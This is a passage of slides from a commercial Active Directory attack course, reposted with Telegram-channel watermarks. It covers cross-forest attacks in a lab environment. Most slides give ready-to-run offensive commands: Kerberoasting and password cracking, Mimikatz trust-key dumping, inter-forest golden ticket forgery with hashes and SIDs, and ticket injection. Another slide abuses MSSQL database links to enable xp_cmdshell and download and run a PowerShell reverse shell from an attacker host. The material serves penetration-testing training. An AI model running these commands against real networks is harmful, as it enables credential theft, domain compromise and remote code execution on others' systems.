https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 288


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 289


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 290


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-
my/

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 291


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 292


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks


• We now have Enterprise Admin privileges in the techcorp.local forest.
• Let's discuss some techniques to move across forest trusts.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 293

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 293


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Kerberoast


• It is possible to execute Kerberoast across Forest trusts.
• Let's enumerate named service accounts across forest trusts
• Using PowerView
Get-DomainTrust | ?{$_.TrustAttributes -eq
'FILTER_SIDS'} | %{Get-DomainUser -SPN -Domain
$_.TargetName}
• Using ActiveDirectory Module:
Get-ADTrust -Filter 'IntraForest -ne $true' | %{Get-
ADUser -Filter {ServicePrincipalName -ne "$null"} -
Properties ServicePrincipalName -Server $_.Name}

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 294

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 294


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Kerberoast


• Request a TGS
C:\AD\Tools\Rubeus.exe kerberoast /user:storagesvc /simple
/domain:eu.local /outfile:euhashes.txt
• Check for the TGS
klist
• Crack using John
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt
C:\AD\Tools\hashes.txt

• Request TGS across trust using PowerShell


Add-Type -AssemblyName System.IdentityModel
New-Object
System.IdentityModel.Tokens.KerberosRequestorSecurityToken -
ArgumentList MSSQLSvc/[email protected]

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 295

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 295


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 296


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 297

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 297


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 301


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 302

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 302


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Unconstrained Delegation


• Recall the Printer bug and its abuse from a machine with Unconstrained
Delegation.
• We have used it to escalate privileges to Domain Admin and Enterprise
Admin.
• It also works across a Two-way forest trust with TGT Delegation
enabled!
• TGT Delegation is disabled by default and must be explicitly enabled
across a trust for the trusted (target) forest.
• In the lab, TGTDelegation is set from usvendor.local to techcorp.local
(but not set for the other direction).

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 303

On July 9 2019, Microsoft updated the TGT


Delegation behavior across forest trusts (even
the existing ones for Server 2012 onwards) by
addressing this issue as CVE-2019-0683
https://techcommunity.microsoft.com/t5/core-infrastructure-and-
security/changes-to-ticket-granting-ticket-tgt-delegation-across-trusts/ba-
p/440283
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-
2019-0683

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 303


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Unconstrained Delegation


• To enumerate if TGTDelegation is enabled across a forest trust, run the below
command from a DC
netdom trust trustingforest /domain:trustedforest
/EnableTgtDelegation

• In the lab, this is to be run on usvendor-dc


netdom trust usvendor.local /domain:techcorp.local
/EnableTgtDelegation
• The PowerShell cmdlets of the ADModule seems to have a bug, the below
command shows TGTDelegation set to False:
Get-ADTrust -server usvendor.local -Filter *
• But when run from usvendor-dc, it shows TGTDelegation to be True.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 304

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 304


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 305


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 306

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 306


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Trust Key


• By abusing the trust flow between forests in a two way trust, it is
possible to access resources across the forest boundary.
• We can use the Trust Key, the same way as in Domain trusts but we can
access only those resources which are explicitly shared with our current
forest.
• Let's try to access a file share 'eushare' on euvendor-dc of
euvendor.local forest from eu.local which is explicitly shared with
Domain Admins of eu.local.
• Note that we are hopping trusts from us.techcrop.local to eu.local to
euvendor.local!

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 307

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 307


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Trust Flow


Across Forest

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 308

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 308


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Trust Abuse


Across Forest

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 309

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 309


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Trust Key


• Like intra forest scenario, we require the trust key for the inter-forest
trust.
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
or
Invoke-Mimikatz -Command '"lsadump::dcsync
/user:eu\euvendor$"'
or
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
• We can also use any of the earlier discussed tools to extract trust keys.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 310

https://adsecurity.org/?p=1588

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 310


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Trust Key


• An inter-forest TGT can be forged
Invoke-Mimikatz -Command '"kerberos::golden
/user:Administrator /domain:eu.local /sid:S-1-5-21-
3657428294-2017276338-1274645009
/rc4:799a0ae7e6ce96369aa7f1e9da25175a /service:krbtgt
/target:euvendor.local /sids:S-1-5-21-4066061358-
3942393892-617142613-519
/ticket:C:\AD\Tools\kekeo_old\sharedwitheu.kirbi"'

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 311

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 311


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Trust Key


• Get a TGS for a service (CIFS below) in the target forest by using the forged trust
ticket.
.\asktgs.exe C:\AD\Tools\kekeo_old\sharedwitheu.kirbi CIFS/euvendor-
dc.euvendor.local

• Tickets for other services (like HOST and RPCSS for WMI, HOST and HTTP for
PowerShell Remoting and WinRM) can be created as well.

• Use the TGS to access the target resource which must be explicitly shared:
.\kirbikator.exe lsa CIFS.euvendor-
dc.euvendor.local.kirbi

ls \\euvendor-dc.euvendor.local\eushare\

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 312

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 312


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Trust Key


• We can also use Rubeus:
C:\Users\Public\Rubeus.exe asktgs
/ticket:C:\Users\Public\sharedwitheu.kirbi
/service:CIFS/euvendor-dc.euvendor.local /dc:euvendor-
dc.euvendor.local /ptt

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 313

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 313


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Trust Key


• This is fine but why can't we access all resources just like Intra forest?
• SID Filtering is the answer. It filters high privilege SIDs from the SIDHistory of a TGT crossing forest
boundary. This means we cannot just go ahead and access resources in the trusting forest as an
Enterprise Admin.
• But there is a catch:
Not filtered at domain and external
S-1-5-21-<Domain>-R Identifiers for end user-created domain trust boundaries. Can be filtered at
R >= 1000 identities and domain groups. member, quarantined, and cross-forest
boundaries.
See the filtering pattern table here: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pac/55fc19f2-55ba-4251-8a6a-
103dd7c66280
• This means, if we have an external trust (or a forest trust with SID history enabled -
/enablesidhistory:yes), we can inject a SIDHistory for RID > 1000 to access resources accessible to
that identity or group in the target trusting forest.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 314

Also highlighted here: https://dirkjanm.io/active-directory-forest-trusts-part-one-


how-does-sid-filtering-work/

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 314


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Trust Key


• We had DA access to eu.local. Let's enumerate trusts from a
PSRemoting session on eu-dc:
Get-ADTrust -Filter *
• SIDFilteringForestAware is set to True, it means SIDHistory is enabled
across the forest trust.
• Please remember that still only RID > 1000 SIDs will be allowed across
the trust boundary.
Get-ADGroup -Identity EUAdmins -Server euvendor.local

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 315

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 315


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Trust Key


• From eu-dc, create a TGT with SIDHistory of EUAdmins group:
Invoke-Mimikatz -Command '"kerberos::golden
/user:Administrator /domain:eu.local /sid:S-1-5-21-
3657428294-2017276338-1274645009
/rc4:799a0ae7e6ce96369aa7f1e9da25175a /service:krbtgt
/target:euvendor.local /sids:S-1-5-21-4066061358-
3942393892-617142613-1103
/ticket:C:\Users\Public\euvendornet.kirbi"'

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 316

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 316


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Trust Key


• Request a TGS:
.\asktgs.exe C:\Users\Public\euvendornet.kirbi HTTP/euvendor-
net.euvendor.local
• Inject that into current session:
.\kirbikator.exe lsa HTTP.euvendor-net.euvendor.local.kirbi
Or
C:\Users\Public\Rubeus.exe asktgs
/ticket:C:\Users\Public\euvendornet.kirbi /service:HTTP/euvendor-
net.euvendor.local /dc:euvendor-dc.euvendor.local /ptt

• Access the euvendor-net machine using PSRemoting:


Invoke-Command -ScriptBlock{whoami} -ComputerName euvendor-
net.euvendor.local -Authentication NegotiateWithImplicitCredential

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 317

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 317


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 318


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 319

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 319


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 320


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 321


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Trust Abuse - MSSQL Servers - Database Links


• A database link allows a SQL Server to access external data sources like
other SQL Servers and OLE DB data sources.
• In case of database links between SQL servers, that is, linked SQL servers
it is possible to execute stored procedures.
• Database links work even across forest trusts.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 322

More at: https://msdn.microsoft.com/en-IN/library/ms188279.aspx

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 322


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Trust Abuse - MSSQL Servers - Database Links


Searching Database Links
• Look for links to remote servers
Get-SQLServerLink -Instance us-mssql.us.techcorp.local -
Verbose
• We can manually enumerate linked servers
select * from master..sysservers

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 323

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 323


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Trust Abuse - MSSQL Servers - Database Links


• Openquery function can be used to run queries on a linked database
select * from openquery("192.168.23.25",'select * from
master..sysservers')
• Openquery queries can be chained to access links within links (nested links)
select * from openquery("192.168.23.25 ",'select * from
openquery("db-sqlsrv",''select @@version as version'')')

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 324

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 324


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Trust Abuse - MSSQL Servers - Database Links


Executing Commands
• On the target server, either xp_cmdshell should be already enabled; or
• If rpcout is enabled (disabled by default), xp_cmdshell can be enabled
using:
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;')
AT "db-sqlsrv"

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 325

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 325


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Trust Abuse - MSSQL Servers - Database Links


Executing Commands
• From the initial SQL server, OS commands can be executed using nested
link queries:
select * from openquery("192.168.23.25",'select * from
openquery("db-sqlsrv",''select @@version as version;exec
master..xp_cmdshell "powershell iex (New-Object
Net.WebClient).DownloadString(''''http://192.168.100.X/I
nvoke-PowerShellTcp.ps1'''')"'')')

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 326

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 326


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Trust Abuse - MSSQL Servers - Database Links


Abusing Database Links
• Crawling links to remote servers
Get-SQLServerLinkCrawl -Instance us-
mssql.us.techcorp.local

• Abusing links to remote servers (without -QueryTarget the command


tries to use xp_cmdshell on every link of the chain)
Get-SQLServerLinkCrawl -Instance us-
mssql.us.techcorp.local -Query 'exec master..xp_cmdshell
''whoami''' -QueryTarget db-sqlsrv

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 327

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 327


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Hands-on 26
• Get a reverse shell on a db-sqlsrv in db.local forest by abusing database
links from us-mssql.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 328

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 328


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 329

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 329


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Foreign Security Principals


• A Foreign Security Principal (FSP) represents a Security Principal in a
external forest trust or special identities (like Authenticated Users,
Enterprise DCs etc.).
• Only SID of a FSP is stored in the Foreign Security Principal Container
which can be resolved using the trust relationship.
• FSP allows external principals to be added to domain local security
groups. Thus, allowing such principals to access resources in the forest.
• Often, FSPs are ignored, mis-configured or too complex to
change/cleanup in an enterprise making them ripe for abuse.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 330

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 330


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - Foreign Security Principals


• Let's enumerate FSPs for the db.local domain using the reverse shell we
have there.
• PowerView:
Find-ForeignGroup -Verbose
Find-ForeignUser -Verbose

• Using ActiveDirectory module:


Get-ADObject -Filter {objectClass -eq
"foreignSecurityPrincipal"}

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 331

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 331


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - ACLs


• Access to resources in a forest trust can also be provided without using
FSPs using ACLs.
• Principals added to ACLs do NOT show up in the
ForeignSecurityPrinicpals container as the container is populated only
when a principal is added to a domain local security group.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 332

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 332


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Cross Forest Attacks - ACLs


• Let's enumerate ACLs for the dbvendor.local domain using the reverse
shell we have on db.local:
Find-InterestingDomainAcl -Domain dbvendor.local

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 333

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 333


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 334


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 335

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 335


